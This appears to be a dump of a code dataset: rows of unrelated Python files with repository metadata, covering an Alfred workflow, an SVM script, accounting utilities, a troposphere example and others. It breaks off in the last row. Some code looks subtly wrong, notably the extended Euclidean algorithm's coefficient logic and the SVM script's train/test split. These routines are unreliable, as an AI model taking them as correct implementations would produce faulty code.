hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c78a9dbe76748ffc4b552241c18002c06e087035 | 1,920 | py | Python | workflow/src/routing.py | mibexsoftware/alfred-stash-workflow | 5cdba4d14c8998b937c1aa6af8e3417251fac540 | [
"MIT"
]
| 13 | 2016-03-31T16:19:59.000Z | 2019-09-26T20:47:57.000Z | workflow/src/routing.py | mibexsoftware/alfred-stash-workflow | 5cdba4d14c8998b937c1aa6af8e3417251fac540 | [
"MIT"
]
| 6 | 2015-09-18T15:24:43.000Z | 2019-10-23T16:51:39.000Z | workflow/src/routing.py | mibexsoftware/alfred-stash-workflow | 5cdba4d14c8998b937c1aa6af8e3417251fac540 | [
"MIT"
]
| 3 | 2015-09-16T18:05:32.000Z | 2020-01-04T19:41:21.000Z | # -*- coding: utf-8 -*-
from src import icons, __version__
from src.actions import HOST_URL
from src.actions.configure import ConfigureWorkflowAction
from src.actions.help import HelpWorkflowAction
from src.actions.index import IndexWorkflowAction
from src.actions.projects import ProjectWorkflowAction
from src.actions.pull_requests import PullRequestWorkflowAction
from src.actions.repositories import RepositoryWorkflowAction
from src.util import workflow, call_alfred
WORKFLOW_ACTIONS = {
':config': ConfigureWorkflowAction,
':projects': ProjectWorkflowAction,
':repos': RepositoryWorkflowAction,
':pullrequests': PullRequestWorkflowAction,
':help': HelpWorkflowAction
}
def route(args): # e.g., args = ":config sethost http://localhost,--exec"
command_string = args[0] # :config sethost http://localhost
command = command_string.split(' ')
if not workflow().settings.get(HOST_URL, None) and 'sethost' not in command:
call_alfred('stash:config sethost ')
return
handler = IndexWorkflowAction
action = next(iter(command), None)
if action:
handler = WORKFLOW_ACTIONS.get(action, IndexWorkflowAction)
if '--exec' in args:
handler().execute(command, cmd_pressed='--cmd' in args, shift_pressed='--shift' in args)
else: # show menu
handler().menu(command)
_notify_if_upgrade_available()
workflow().send_feedback()
def _notify_if_upgrade_available():
if workflow().update_available:
new_version = workflow().cached_data('__workflow_update_status', max_age=0)['version']
workflow().add_item('An update is available!',
'Update the workflow from version {} to {}'.format(__version__, new_version),
arg=':config update',
valid=True,
icon=icons.UPDATE)
| 39.183673 | 105 | 0.678125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 352 | 0.183333 |
c78c8acd4546ee0e8cf65b0df48d4a928c3e7481 | 1,262 | py | Python | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
]
| 2 | 2020-10-02T03:01:32.000Z | 2020-12-06T09:21:06.000Z | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
]
| null | null | null | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
]
| null | null | null | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import classification_report, confusion_matrix
from mlxtend.plotting import plot_decision_regions
# from sklearn import datasets
from pandas.plotting import scatter_matrix
from joblib import dump, load
import collections
kaggle_data = pd.read_csv('data/kaggle.csv')
data = pd.read_csv('data/new_data.csv')
kaggle_X = kaggle_data.iloc[:, :30].values
X = data.drop(['index'],axis=1).iloc[:, :30].values
y = data.iloc[:,-1].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.99)
kaggle_X_train, kaggle_X_test, kaggle_y_train, kaggle_y_test = train_test_split(X, y, test_size = 0.02)
svclassifier = SVC(kernel='poly',degree=5)
svclassifier.fit(kaggle_X_train, kaggle_y_train)
dump(svclassifier, 'pre_model.joblib')
y_pred = svclassifier.predict(X_test)
print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
# print("X=%s, Predicted=%s" % (test_2d, y_pred_test[0]))
# print(y_pred.shape)
# TESTING ZONE
X = [[-1,1,0,-1,-1,-1,1,0,-1,1,1,-1,0,0,-1,-1,-1,-1,0,1,0,0,0,-1,1,1,1,1,-1,-1]]
print("PREDICTION:",svclassifier.predict(X))
| 33.210526 | 103 | 0.759113 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 202 | 0.160063 |
c78d0f81c7f3ce50a968bb140ed1caaa45e4bf4b | 547 | py | Python | PE032.py | CaptainSora/Python-Project-Euler | 056400f434eec837ece5ef06653b310ebfcc3d4e | [
"MIT"
]
| null | null | null | PE032.py | CaptainSora/Python-Project-Euler | 056400f434eec837ece5ef06653b310ebfcc3d4e | [
"MIT"
]
| null | null | null | PE032.py | CaptainSora/Python-Project-Euler | 056400f434eec837ece5ef06653b310ebfcc3d4e | [
"MIT"
]
| null | null | null | from itertools import count
from _pandigital_tools import is_pandigital
def pand_products():
"""
Returns the sum of all numbers n which have a factorization a * b = n such
that a, b, n are (cumulatively) 1 through 9 pandigital.
"""
total = set()
for a in range(2, 100):
for b in count(a):
if len(str(a) + str(b) + str(a * b)) > 9:
break
elif is_pandigital(a, b, a * b):
total.add(a * b)
return sum(total)
def solve(vol=0):
return pand_products()
| 23.782609 | 78 | 0.570384 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 150 | 0.274223 |
c78d62ba8abdde61ef2fb89e7ca95a09bbcfc5d2 | 282 | py | Python | v1/models.py | jdubansky/openstates.org | 6fd5592aae554c4bb201f0a76ed3605bff5204c2 | [
"MIT"
]
| 1 | 2022-01-17T11:54:28.000Z | 2022-01-17T11:54:28.000Z | v1/models.py | washabstract/openstates.org | dc541ae5cd09dd3b3db623178bf32a03d0246f01 | [
"MIT"
]
| null | null | null | v1/models.py | washabstract/openstates.org | dc541ae5cd09dd3b3db623178bf32a03d0246f01 | [
"MIT"
]
| null | null | null | from django.db import models
from openstates.data.models import Bill
class LegacyBillMapping(models.Model):
legacy_id = models.CharField(max_length=20, primary_key=True)
bill = models.ForeignKey(
Bill, related_name="legacy_mapping", on_delete=models.CASCADE
)
| 28.2 | 69 | 0.758865 | 210 | 0.744681 | 0 | 0 | 0 | 0 | 0 | 0 | 16 | 0.056738 |
c78e2f38914cd69e3bd290dd0efeba4071626991 | 14,594 | py | Python | corehq/apps/accounting/utils.py | satyaakam/commcare-hq | 233f255ff20ab3a16013e9fdfdb9c1dcf632e415 | [
"BSD-3-Clause"
]
| null | null | null | corehq/apps/accounting/utils.py | satyaakam/commcare-hq | 233f255ff20ab3a16013e9fdfdb9c1dcf632e415 | [
"BSD-3-Clause"
]
| 1 | 2021-06-02T04:45:16.000Z | 2021-06-02T04:45:16.000Z | corehq/apps/accounting/utils.py | satyaakam/commcare-hq | 233f255ff20ab3a16013e9fdfdb9c1dcf632e415 | [
"BSD-3-Clause"
]
| null | null | null | import datetime
import logging
from collections import defaultdict, namedtuple
from django.conf import settings
from django.template.loader import render_to_string
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from django_prbac.models import Grant, Role, UserRole
from corehq.const import USER_DATE_FORMAT
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.dates import add_months
from corehq import privileges
from corehq.apps.accounting.exceptions import (
AccountingError,
ProductPlanNotFoundError,
)
from corehq.apps.domain.models import Domain
from corehq.util.quickcache import quickcache
from corehq.util.view_utils import absolute_reverse
logger = logging.getLogger('accounting')
EXCHANGE_RATE_DECIMAL_PLACES = 9
def log_accounting_error(message, show_stack_trace=False):
logger.error("[BILLING] %s" % message, exc_info=show_stack_trace)
def log_accounting_info(message):
logger.info("[BILLING] %s" % message)
def months_from_date(reference_date, months_from_date):
year, month = add_months(reference_date.year, reference_date.month, months_from_date)
return datetime.date(year, month, 1)
def ensure_domain_instance(domain):
if not isinstance(domain, Domain):
domain = Domain.get_by_name(domain)
return domain
def fmt_feature_rate_dict(feature, feature_rate=None):
"""
This will be turned into a JSON representation of this Feature and its FeatureRate
"""
if feature_rate is None:
feature_rate = feature.get_rate()
return {
'name': feature.name,
'feature_type': feature.feature_type,
'feature_id': feature.id,
'rate_id': feature_rate.id,
'monthly_fee': str(feature_rate.monthly_fee),
'monthly_limit': feature_rate.monthly_limit,
'per_excess_fee': str(feature_rate.per_excess_fee),
}
def fmt_product_rate_dict(product_name, product_rate=None):
"""
This will be turned into a JSON representation of this SoftwareProductRate
"""
from corehq.apps.accounting.models import SoftwareProductRate
if product_rate is None:
try:
product_rate = SoftwareProductRate.objects.filter(
is_active=True,
name=product_name,
).latest('date_created')
except SoftwareProductRate.DoesNotExist:
product_rate = SoftwareProductRate.objects.create(name=product_name, is_active=True)
return {
'name': product_rate.name,
'rate_id': product_rate.id,
'monthly_fee': str(product_rate.monthly_fee),
}
def get_privileges(plan_version):
role = plan_version.role.get_cached_role()
return set([grant.to_role.slug for grant in role.memberships_granted.all()])
ChangeStatusResult = namedtuple('ChangeStatusResult', ['adjustment_reason', 'downgraded_privs', 'upgraded_privs'])
def get_change_status(from_plan_version, to_plan_version):
from_privs = (
get_privileges(from_plan_version)
if from_plan_version is not None
else set(privileges.MAX_PRIVILEGES)
)
to_privs = get_privileges(to_plan_version) if to_plan_version is not None else set()
downgraded_privs = from_privs.difference(to_privs)
upgraded_privs = to_privs
from corehq.apps.accounting.models import SubscriptionAdjustmentReason as Reason
if from_plan_version is None:
adjustment_reason = Reason.CREATE
else:
adjustment_reason = Reason.SWITCH
if len(downgraded_privs) == 0 and len(upgraded_privs) > 0:
adjustment_reason = Reason.UPGRADE
elif len(upgraded_privs) == 0 and len(downgraded_privs) > 0:
adjustment_reason = Reason.DOWNGRADE
return ChangeStatusResult(adjustment_reason, downgraded_privs, upgraded_privs)
def domain_has_privilege_cache_args(domain, privilege_slug, **assignment):
return [
domain.name if isinstance(domain, Domain) else domain,
privilege_slug
]
@quickcache(domain_has_privilege_cache_args, timeout=10)
def domain_has_privilege(domain, privilege_slug, **assignment):
from corehq.apps.accounting.models import Subscription
try:
plan_version = Subscription.get_subscribed_plan_by_domain(domain)
privilege = Role.get_privilege(privilege_slug, assignment)
if privilege is None:
return False
if plan_version.role.has_privilege(privilege):
return True
except ProductPlanNotFoundError:
return False
except AccountingError:
pass
return False
@quickcache(['domain_name'], timeout=15 * 60)
def domain_is_on_trial(domain_name):
from corehq.apps.accounting.models import Subscription
subscription = Subscription.get_active_subscription_by_domain(domain_name)
return subscription and subscription.is_trial
def is_active_subscription(date_start, date_end, today=None):
today = today or datetime.date.today()
return ((date_start is None or date_start <= today)
and (date_end is None or today < date_end))
def has_subscription_already_ended(subscription):
return (subscription.date_end is not None
and subscription.date_end <= datetime.date.today())
def get_money_str(amount):
if amount is not None:
if amount < 0:
fmt = "-$%0.2f"
amount = abs(amount)
else:
fmt = "$%0.2f"
return fmt % amount
return ""
def get_address_from_invoice(invoice):
from corehq.apps.accounting.invoice_pdf import Address
from corehq.apps.accounting.models import BillingContactInfo
try:
contact_info = BillingContactInfo.objects.get(
account=invoice.account,
)
return Address(
name=(
"%s %s" %
(contact_info.first_name
if contact_info.first_name is not None else "",
contact_info.last_name
if contact_info.last_name is not None else "")
),
company_name=contact_info.company_name,
first_line=contact_info.first_line,
second_line=contact_info.second_line,
city=contact_info.city,
region=contact_info.state_province_region,
postal_code=contact_info.postal_code,
country=contact_info.country,
)
except BillingContactInfo.DoesNotExist:
return Address()
def get_dimagi_from_email():
return ("Dimagi CommCare Accounts <%(email)s>" % {
'email': settings.INVOICING_CONTACT_EMAIL,
})
def quantize_accounting_decimal(decimal_value):
return "%0.2f" % decimal_value
def fmt_dollar_amount(decimal_value):
return _("USD %s") % quantize_accounting_decimal(decimal_value)
def get_customer_cards(username, domain):
from corehq.apps.accounting.models import (
StripePaymentMethod, PaymentMethodType,
)
import stripe
try:
payment_method = StripePaymentMethod.objects.get(
web_user=username,
method_type=PaymentMethodType.STRIPE
)
stripe_customer = payment_method.customer
return dict(stripe_customer.cards)
except StripePaymentMethod.DoesNotExist:
pass
except stripe.error.AuthenticationError:
if not settings.STRIPE_PRIVATE_KEY:
log_accounting_info("Private key is not defined in settings")
else:
raise
return None
def is_accounting_admin(user):
accounting_privilege = Role.get_privilege(privileges.ACCOUNTING_ADMIN)
if accounting_privilege is None:
return False
try:
return user.prbac_role.has_privilege(accounting_privilege)
except (AttributeError, UserRole.DoesNotExist):
return False
def make_anchor_tag(href, name, attrs=None):
context = {
'href': href,
'name': name,
'attrs': attrs or {},
}
return render_to_string('accounting/partials/anchor_tag.html', context)
def get_default_domain_url(domain):
from corehq.apps.domain.views.settings import DefaultProjectSettingsView
return absolute_reverse(
DefaultProjectSettingsView.urlname,
args=[domain],
)
def ensure_grants(grants_to_privs, dry_run=False, verbose=False, roles_by_slug=None):
"""
Adds a parameterless grant between grantee and priv, looked up by slug.
:param grants_to_privs: An iterable of two-tuples:
`(grantee_slug, priv_slugs)`. Will only be iterated once.
"""
dry_run_tag = "[DRY RUN] " if dry_run else ""
if roles_by_slug is None:
roles_by_slug = {role.slug: role for role in Role.objects.all()}
granted = defaultdict(set)
for grant in Grant.objects.select_related('from_role', 'to_role').all():
granted[grant.from_role.slug].add(grant.to_role.slug)
grants_to_create = []
for grantee_slug, priv_slugs in grants_to_privs:
if grantee_slug not in roles_by_slug:
logger.info('grantee %s does not exist.', grantee_slug)
continue
for priv_slug in priv_slugs:
if priv_slug not in roles_by_slug:
logger.info('privilege %s does not exist.', priv_slug)
continue
if priv_slug in granted[grantee_slug]:
if verbose or dry_run:
logger.info('%sPrivilege already granted: %s => %s',
dry_run_tag, grantee_slug, priv_slug)
else:
granted[grantee_slug].add(priv_slug)
if verbose or dry_run:
logger.info('%sGranting privilege: %s => %s',
dry_run_tag, grantee_slug, priv_slug)
if not dry_run:
grants_to_create.append(Grant(
from_role=roles_by_slug[grantee_slug],
to_role=roles_by_slug[priv_slug]
))
if grants_to_create:
Role.get_cache().clear()
Grant.objects.bulk_create(grants_to_create)
def log_removed_grants(priv_slugs, dry_run=False):
grants = Grant.objects.filter(to_role__slug__in=list(priv_slugs))
if grants:
logger.info("%sRemoving privileges: %s",
("[DRY RUN] " if dry_run else ""),
", ".join(g.to_role.slug for g in grants),
)
def get_account_name_from_default_name(default_name):
from corehq.apps.accounting.models import BillingAccount
if not BillingAccount.objects.filter(name=default_name).exists():
return default_name
else:
matching_regex_count = BillingAccount.objects.filter(
name__iregex=r'^%s \(\d+\)$' % default_name,
).count()
return '%s (%d)' % (
default_name,
matching_regex_count + 1
)
def cancel_future_subscriptions(domain_name, from_date, web_user):
from corehq.apps.accounting.models import (
Subscription,
SubscriptionAdjustment,
SubscriptionAdjustmentReason,
)
for later_subscription in Subscription.visible_objects.filter(
subscriber__domain=domain_name,
date_start__gt=from_date,
).order_by('date_start').all():
later_subscription.date_end = later_subscription.date_start
later_subscription.save()
SubscriptionAdjustment.record_adjustment(
later_subscription,
reason=SubscriptionAdjustmentReason.CANCEL,
web_user=web_user,
note="Cancelled due to changing subscription",
)
def pause_current_subscription(domain_name, web_user, current_subscription):
from corehq.apps.accounting.models import (
Subscription,
DefaultProductPlan,
SoftwarePlanEdition,
SubscriptionAdjustmentMethod,
SubscriptionType,
ProBonoStatus,
FundingSource,
)
cancel_future_subscriptions(domain_name, datetime.date.today(), web_user)
paused_plan_version = DefaultProductPlan.get_default_plan_version(
SoftwarePlanEdition.PAUSED
)
if current_subscription.is_below_minimum_subscription:
current_subscription.update_subscription(
date_start=current_subscription.date_start,
date_end=current_subscription.date_start + datetime.timedelta(days=30)
)
return Subscription.new_domain_subscription(
account=current_subscription.account,
domain=domain_name,
plan_version=paused_plan_version,
date_start=current_subscription.date_start + datetime.timedelta(days=30),
web_user=web_user,
adjustment_method=SubscriptionAdjustmentMethod.USER,
service_type=SubscriptionType.PRODUCT,
pro_bono_status=ProBonoStatus.NO,
funding_source=FundingSource.CLIENT,
do_not_invoice=True,
no_invoice_reason='Paused plan',
)
else:
return current_subscription.change_plan(
paused_plan_version,
web_user=web_user,
adjustment_method=SubscriptionAdjustmentMethod.USER,
service_type=SubscriptionType.PRODUCT,
pro_bono_status=ProBonoStatus.NO,
do_not_invoice=True,
no_invoice_reason='Paused plan',
)
def is_downgrade(current_edition, next_edition):
from corehq.apps.accounting.models import SoftwarePlanEdition
plans = SoftwarePlanEdition.SELF_SERVICE_ORDER + [SoftwarePlanEdition.ENTERPRISE]
return plans.index(current_edition) > plans.index(next_edition)
def clear_plan_version_cache():
from corehq.apps.accounting.models import SoftwarePlan
for software_plan in SoftwarePlan.objects.all():
SoftwarePlan.get_version.clear(software_plan)
def get_paused_plan_context(request, domain):
from corehq.apps.accounting.models import Subscription
from corehq.apps.domain.views import SelectPlanView
current_sub = Subscription.get_active_subscription_by_domain(domain)
if (not current_sub
or not current_sub.plan_version.is_paused
or not current_sub.previous_subscription):
return {}
previous_edition = (current_sub.previous_subscription.plan_version.plan.edition
if current_sub.previous_subscription else "")
return {
'is_paused': True,
'previous_edition': previous_edition,
'paused_date': current_sub.date_start.strftime(USER_DATE_FORMAT),
'change_plan_url': reverse(SelectPlanView.urlname, args=[domain]),
'can_edit_billing_info': request.couch_user.is_domain_admin(domain),
}
| 34.419811 | 114 | 0.688434 | 0 | 0 | 0 | 0 | 849 | 0.058175 | 0 | 0 | 1,226 | 0.084007 |
c78ed3281b65fd17334bed8b20f794b80892e233 | 802 | py | Python | RSA/Algorithm/EEA.py | Pumpkin-NN/Cryptography | 968e3f55fcc6a02d0badeec157776ca8f07607b8 | [
"MIT"
]
| null | null | null | RSA/Algorithm/EEA.py | Pumpkin-NN/Cryptography | 968e3f55fcc6a02d0badeec157776ca8f07607b8 | [
"MIT"
]
| null | null | null | RSA/Algorithm/EEA.py | Pumpkin-NN/Cryptography | 968e3f55fcc6a02d0badeec157776ca8f07607b8 | [
"MIT"
]
| null | null | null |
def extended_euclidean_algorithm(a, b):
# Initial s = 1
s = 1
list_s = []
list_t = []
# Algorithm
while b > 0:
# Find the remainder of a, b
r = a % b
if r > 0:
# The t expression
t = (r - (a * s)) // b
list_t.append(t)
list_s.append(s)
# Use b to be the new a
a = b
if r > 0:
# Use the remainder to be the new b
b = r
else:
break
# Find the coefficients s and t
for i in range(len(list_t)):
if i+1 < len(list_t):
# Find the coefficient t
t = list_t[0] + (list_t[(len(list_t)-1)] * s)
# Find the coefficient s
s = list_s[i] + list_t[i] * list_t[i+1]
return t
| 23.588235 | 57 | 0.438903 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 209 | 0.260599 |
c790959983852e5ff5dc7391f5d9c3bf229bac12 | 435 | py | Python | hci/command/commands/le_apcf_commands/apcf_service_data.py | cc4728/python-hci | d988f69c55972af445ec3ba04fd4cd1199593d10 | [
"MIT"
]
| 3 | 2021-12-16T14:32:45.000Z | 2022-01-25T03:10:48.000Z | hci/command/commands/le_apcf_commands/apcf_service_data.py | cc4728/python-hci | d988f69c55972af445ec3ba04fd4cd1199593d10 | [
"MIT"
]
| null | null | null | hci/command/commands/le_apcf_commands/apcf_service_data.py | cc4728/python-hci | d988f69c55972af445ec3ba04fd4cd1199593d10 | [
"MIT"
]
| 1 | 2022-01-25T03:10:50.000Z | 2022-01-25T03:10:50.000Z | from ..le_apcf_command_pkt import LE_APCF_Command
from struct import pack, unpack
from enum import IntEnum
"""
This pare base on spec <<Android BT HCI Requirement for BLE feature>> v0.52
Advertisement Package Content filter
"""
class APCF_Service_Data(LE_APCF_Command):
def __init__(self):
# TODO generate cmd
super().__init__()
def __str__(self):
return super().__str__()+''.join(['{}']).format("") | 25.588235 | 75 | 0.698851 | 204 | 0.468966 | 0 | 0 | 0 | 0 | 0 | 0 | 147 | 0.337931 |
c790fdff7571a6a4a1222a967671954a3b60828b | 1,468 | py | Python | source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 3b990e5fd92543f7152b4a2c8e689e771578c047 | [
"Apache-2.0"
]
| 178 | 2016-09-21T19:51:28.000Z | 2021-09-07T17:37:06.000Z | source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 3b990e5fd92543f7152b4a2c8e689e771578c047 | [
"Apache-2.0"
]
| null | null | null | source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 3b990e5fd92543f7152b4a2c8e689e771578c047 | [
"Apache-2.0"
]
| 17 | 2016-10-21T02:11:13.000Z | 2020-10-07T19:11:54.000Z | """
DocumentNGramSymWinGraph.py
Created on May 23, 2017, 4:56 PM
"""
import networkx as nx
import pygraphviz as pgv
import matplotlib.pyplot as plt
from networkx.drawing.nx_agraph import graphviz_layout
from DocumentNGramGraph import DocumentNGramGraph
class DocumentNGramSymWinGraph(DocumentNGramGraph):
# an extension of DocumentNGramGraph
# for symmetric windowing
def buildGraph(self,verbose = False, d=[]):
# set Data @class_variable
self.setData(d)
Data = self._Data
# build ngram
ng = self.build_ngram()
s = len(ng)
# calculate window
win = self._Dwin//2
# initialize graph
self._Graph = nx.Graph()
if(s>=2 and win>=1):
# max possible window size (bounded by win)
o = min(win,s)+1
window = ng[1:o]
i = o
# first build the full window
for gram in ng[0:s-1]:
for w in window:
self.addEdgeInc(gram,w)
window.pop(0)
# if window's edge has reached
# it's the limit of ng stop
# appending
if i<s:
window.append(ng[i][:])
i+=1
# print Graph (optional)
if verbose:
self.GraphDraw(self._GPrintVerbose)
return self._Graph
| 26.690909 | 55 | 0.52248 | 1,195 | 0.814033 | 0 | 0 | 0 | 0 | 0 | 0 | 380 | 0.258856 |
c791642581cbd1a8e05d99ab1f306e65029dc666 | 2,212 | py | Python | examples/EC2Conditions.py | DrLuke/troposphere | 05672a2b0cf87215dbd6a2a656669e0d3c92d0e5 | [
"BSD-2-Clause"
]
| 1 | 2021-04-03T22:24:36.000Z | 2021-04-03T22:24:36.000Z | examples/EC2Conditions.py | cartermeyers/troposphere | 4b42fa0d65f73cec28184b5349aa198fb8ee5b2e | [
"BSD-2-Clause"
]
| 1 | 2021-06-25T15:20:46.000Z | 2021-06-25T15:20:46.000Z | examples/EC2Conditions.py | cartermeyers/troposphere | 4b42fa0d65f73cec28184b5349aa198fb8ee5b2e | [
"BSD-2-Clause"
]
| 5 | 2020-05-10T13:50:32.000Z | 2021-09-09T09:06:54.000Z | from __future__ import print_function
from troposphere import (
Template, Parameter, Ref, Condition, Equals, And, Or, Not, If
)
from troposphere import ec2
parameters = {
"One": Parameter(
"One",
Type="String",
),
"Two": Parameter(
"Two",
Type="String",
),
"Three": Parameter(
"Three",
Type="String",
),
"Four": Parameter(
"Four",
Type="String",
),
"SshKeyName": Parameter(
"SshKeyName",
Type="String",
)
}
conditions = {
"OneEqualsFoo": Equals(
Ref("One"),
"Foo"
),
"NotOneEqualsFoo": Not(
Condition("OneEqualsFoo")
),
"BarEqualsTwo": Equals(
"Bar",
Ref("Two")
),
"ThreeEqualsFour": Equals(
Ref("Three"),
Ref("Four")
),
"OneEqualsFooOrBarEqualsTwo": Or(
Condition("OneEqualsFoo"),
Condition("BarEqualsTwo")
),
"OneEqualsFooAndNotBarEqualsTwo": And(
Condition("OneEqualsFoo"),
Not(Condition("BarEqualsTwo"))
),
"OneEqualsFooAndBarEqualsTwoAndThreeEqualsPft": And(
Condition("OneEqualsFoo"),
Condition("BarEqualsTwo"),
Equals(Ref("Three"), "Pft")
),
"OneIsQuzAndThreeEqualsFour": And(
Equals(Ref("One"), "Quz"),
Condition("ThreeEqualsFour")
),
"LaunchInstance": And(
Condition("OneEqualsFoo"),
Condition("NotOneEqualsFoo"),
Condition("BarEqualsTwo"),
Condition("OneEqualsFooAndNotBarEqualsTwo"),
Condition("OneIsQuzAndThreeEqualsFour")
),
"LaunchWithGusto": And(
Condition("LaunchInstance"),
Equals(Ref("One"), "Gusto")
)
}
resources = {
"Ec2Instance": ec2.Instance(
"Ec2Instance",
Condition="LaunchInstance",
ImageId=If("ConditionNameEqualsFoo", "ami-12345678", "ami-87654321"),
InstanceType="t1.micro",
KeyName=Ref("SshKeyName"),
SecurityGroups=["default"],
)
}
t = Template()
for p in parameters.values():
t.add_parameter(p)
for k in conditions:
t.add_condition(k, conditions[k])
for r in resources.values():
t.add_resource(r)
print(t.to_json())
| 22.343434 | 77 | 0.573689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 767 | 0.346745 |
c79252ab386af5d00249bc02769ec35279e30201 | 768 | py | Python | fist_phase/08_objects.py | kapuni/exercise_py | b60ba8462d2545cae57483bcb0b3428b03c5d522 | [
"MIT"
]
| null | null | null | fist_phase/08_objects.py | kapuni/exercise_py | b60ba8462d2545cae57483bcb0b3428b03c5d522 | [
"MIT"
]
| null | null | null | fist_phase/08_objects.py | kapuni/exercise_py | b60ba8462d2545cae57483bcb0b3428b03c5d522 | [
"MIT"
]
| null | null | null | class Student(object):
# __init__是一个特殊方法用于在创建对象时进行初始化操作
# 通过这个方法我们可以为学生对象绑定name和age两个属性
def __init__(self, name, age):
self.name = name
self.age = age
def study(self, course_name):
print('%s正在学习%s.' % (self.name, course_name))
# PEP 8要求标识符的名字用全小写多个单词用下划线连接
# 但是部分程序员和公司更倾向于使用驼峰命名法(驼峰标识)
def watch_movie(self):
if self.age < 18:
print('%s只能观看《熊出没》.' % self.name)
else:
print('%s正在观看岛国爱情大电影.' % self.name)
def main():
# 创建学生对象并指定姓名和年龄
stu1 = Student('骆昊', 38)
# 给对象发study消息
stu1.study('Python程序设计')
# 给对象发watch_av消息
stu1.watch_movie()
stu2 = Student('王大锤', 15)
stu2.study('思想品德')
stu2.watch_movie()
if __name__ == '__main__':
main() | 23.272727 | 53 | 0.605469 | 728 | 0.67658 | 0 | 0 | 0 | 0 | 0 | 0 | 552 | 0.513011 |
c79307bf6012742aa0a7a562893d0160e400a873 | 1,108 | py | Python | lrtc_lib/data/load_dataset.py | MovestaDev/low-resource-text-classification-framework | 4380755a65b35265e84ecbf4b87e872d79e8f079 | [
"Apache-2.0"
]
| 57 | 2020-11-18T15:13:06.000Z | 2022-03-28T22:33:26.000Z | lrtc_lib/data/load_dataset.py | MovestaDev/low-resource-text-classification-framework | 4380755a65b35265e84ecbf4b87e872d79e8f079 | [
"Apache-2.0"
]
| 5 | 2021-02-23T22:11:07.000Z | 2021-12-13T00:13:48.000Z | lrtc_lib/data/load_dataset.py | MovestaDev/low-resource-text-classification-framework | 4380755a65b35265e84ecbf4b87e872d79e8f079 | [
"Apache-2.0"
]
| 14 | 2021-02-10T08:55:27.000Z | 2022-02-23T22:37:54.000Z | # (c) Copyright IBM Corporation 2020.
# LICENSE: Apache License 2.0 (Apache-2.0)
# http://www.apache.org/licenses/LICENSE-2.0
import logging
from lrtc_lib.data_access import single_dataset_loader
from lrtc_lib.data_access.processors.dataset_part import DatasetPart
from lrtc_lib.oracle_data_access import gold_labels_loader
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s')
def load(dataset: str, force_new: bool = False):
for part in DatasetPart:
dataset_name = dataset + '_' + part.name.lower()
# load dataset (generate Documents and TextElements)
if force_new:
single_dataset_loader.clear_all_saved_files(dataset_name)
single_dataset_loader.load_dataset(dataset_name, force_new)
# load gold labels
if force_new:
gold_labels_loader.clear_gold_labels_file(dataset_name)
gold_labels_loader.load_gold_labels(dataset_name, force_new)
logging.info('-' * 60)
if __name__ == '__main__':
dataset_name = 'polarity'
load(dataset=dataset_name) | 35.741935 | 115 | 0.730144 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 286 | 0.258123 |
c79467938af160abb2d49f1add583ea15a8cc080 | 8,019 | py | Python | graphql_compiler/compiler/emit_match.py | BarracudaPff/code-golf-data-pythpn | 42e8858c2ebc6a061012bcadb167d29cebb85c5e | [
"MIT"
]
| null | null | null | graphql_compiler/compiler/emit_match.py | BarracudaPff/code-golf-data-pythpn | 42e8858c2ebc6a061012bcadb167d29cebb85c5e | [
"MIT"
]
| null | null | null | graphql_compiler/compiler/emit_match.py | BarracudaPff/code-golf-data-pythpn | 42e8858c2ebc6a061012bcadb167d29cebb85c5e | [
"MIT"
]
